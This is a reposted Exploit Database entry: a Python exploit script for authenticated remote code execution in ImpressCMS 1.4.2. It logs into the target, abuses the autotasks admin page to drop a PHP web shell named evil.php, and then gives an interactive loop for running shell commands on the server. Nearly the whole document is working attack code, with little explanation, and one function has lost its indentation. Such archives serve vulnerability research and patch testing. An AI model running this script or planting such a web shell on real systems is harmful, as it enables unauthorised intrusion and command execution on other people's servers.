ImpressCMS 1.4.2 – Remote Code Execution (RCE) (Authenticated)

• Exploit Database
• 34 阅读

• 作者： Halit AKAYDIN
  日期： 2021-09-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50298/

• # Exploit Title: ImpressCMS 1.4.2 - Remote Code Execution (RCE) (Authenticated)
  # Date: 15-09-2021
  # Exploit Author: Halit AKAYDIN (hLtAkydn)
  # Vendor Homepage: https://www.impresscms.org/
  # Software Link: https://www.impresscms.org/modules/downloads/
  # Version: 1.4.2
  # Category: Webapps
  # Tested on: Linux/Windows
  
  # ImpressCMS is a multilingual content management system for the web
  # Contains an endpoint that allows remote access
  # Autotask page misconfigured, causing security vulnerability
  
  
  
  # Example: python3 exploit.py -u http://example.com -l admin -p Admin123
  
  import requests
  import argparse
  import sys
  from time import sleep
  
  session = requests.session()
  
  def main():
  	parser = argparse.ArgumentParser(description='Impresscms Version 1.4.2 - Remote Code Execution (Authenticated)')
  	parser.add_argument('-u', '--host', type=str, required=True)
  	parser.add_argument('-l', '--login', type=str, required=True)
  	parser.add_argument('-p', '--password', type=str, required=True)
  	args = parser.parse_args()
  	print("\nImpresscms Version 1.4.2 - Remote Code Execution (Authenticated)",
  		"\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
  	exploit(args)
  
  def countdown(time_sec):
  while time_sec:
  mins, secs = divmod(time_sec, 60)
  timeformat = '{:02d}'.format(secs)
  print("["+timeformat+"] The task is expected to run!", end='\r')
  sleep(1)
  time_sec -= 1
  
  def exploit(args):
  	#Check http or https
  	if args.host.startswith(('http://', 'https://')):
  		print("[?] Check Url...\n")
  		args.host = args.host
  		if args.host.endswith('/'):
  			args.host = args.host[:-1]
  		sleep(2)
  	else:
  		print("\n[?] Check Adress...\n")
  		args.host = "http://" + args.host
  		args.host = args.host
  		if args.host.endswith('/'):
  			args.host = args.host[:-1]
  		sleep(2)
  
  	try:
  		response = requests.get(args.host)
  		if response.status_code != 200:
  			print("[-] Address not reachable!")
  			sleep(2)
  			exit(1)
  	except requests.ConnectionError as exception:
  		print("[-] Address not reachable")
  		exit(1)
  
  
  	response = requests.get(args.host + "/evil.php")
  	if response.status_code == 200:
  		print("[*] Exploit file exists!\n")
  		sleep(2)
  		print("[+] Exploit Done!\n")
  
  		while True:
  			cmd = input("$ ")
  			url = args.host + "/evil.php?cmd=" + cmd
  			headers = {
  				"Upgrade-Insecure-Requests": "1",
  				"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
  			}
  
  			response = requests.post(url, headers=headers, timeout=5)
  
  			if response.text == "":
  				print(cmd + ": command not found\n")
  			else:
  				print(response.text)
  
  	else:
  		#Login and set cookie
  		url = args.host + "/user.php"
  		cookies = {
  			"ICMSSESSION": "gjj2svl7qjqorj5rs87b6thmi5"
  		}
  
  		headers = {
  			"Cache-Control": "max-age=0",
  			"Upgrade-Insecure-Requests": "1",
  			"Origin": args.host,
  			"Content-Type": "application/x-www-form-urlencoded",
  			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
  			"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
  			"Referer": args.host,
  			"Accept-Encoding": "gzip, deflate",
  			"Accept-Language": "en-US,en;q=0.9",
  			"Connection": "close"
  		}
  
  		data = {
  			"uname": args.login,
  			"pass": args.password,
  			"xoops_redirect": "/",
  			"op": "login"
  		}
  
  		response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)
  		new_cookies = session.cookies.get("ICMSSESSION")
  
  		if (new_cookies is None):
  			print("[-] Login Failed...\n")
  			print("Your username or password is incorrect.")
  			sleep(2)
  			exit(1)
  		else:
  			print("[+] Success Login...\n")
  			sleep(2)
  
  			# Create Tasks
  			url = args.host + "/modules/system/admin.php?fct=autotasks&op=mod"
  			cookies = {
  			"ICMSSESSION": new_cookies
  			}
  
  			headers = {
  			"Cache-Control": "max-age=0",
  			"Upgrade-Insecure-Requests": "1",
  			"Origin": args.host,
  			"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryZ2hA91yNO8FWPZmk",
  			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
  			"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
  			"Referer": args.host + "/modules/system/admin.php?fct=autotasks&op=mod",
  			"Accept-Encoding": "gzip, deflate",
  			"Accept-Language": "en-US,en;q=0.9",
  			"Connection": "close"
  			}
  
  			data = "------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_id\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_lastruntime\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_name\"\r\n\r\nrce\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_code\"\r\n\r\nfile_put_contents('../evil.php', \"<?php system(\\x24_GET['cmd']); ?>\");\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_repeat\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_interval\"\r\n\r\n0001\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_onfinish\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_enabled\"\r\n\r\n1\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_type\"\r\n\r\n:custom\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_addon_id\"\r\n\r\n\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"icms_page_before_form\"\r\n\r\n"+args.host+"/modules/system/admin.php?fct=autotasks\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"op\"\r\n\r\naddautotasks\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"modify_button\"\r\n\r\nSubmit\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk--\r\n"
  			response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)
  
  			if response.headers.get("location") == args.host + "/modules/system/admin.php?fct=autotasks":
  				print("[*] Task Create.\n")
  				sleep(2)
  
  				countdown(60)
  
  				print("\n\n[+] Exploit Done!\n")
  				sleep(2)
  
  				while True:
  					cmd = input("$ ")
  					url = args.host + "/evil.php?cmd=" + cmd
  					headers = {
  						"Upgrade-Insecure-Requests": "1",
  						"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
  					}
  
  					response = requests.post(url, headers=headers, timeout=5)
  					if response.text == "":
  						print(cmd + ": command not found\n")
  					else:
  						print(response.text)
  			elif response.headers.get("location") == args.host + "/user.php":
  				print("[!] Unauthorized user!\n\n")
  				print("Requires user with create task permissions.")
  				sleep(2)
  			else:
  				pass
  
  
  if __name__ == '__main__':
  	main()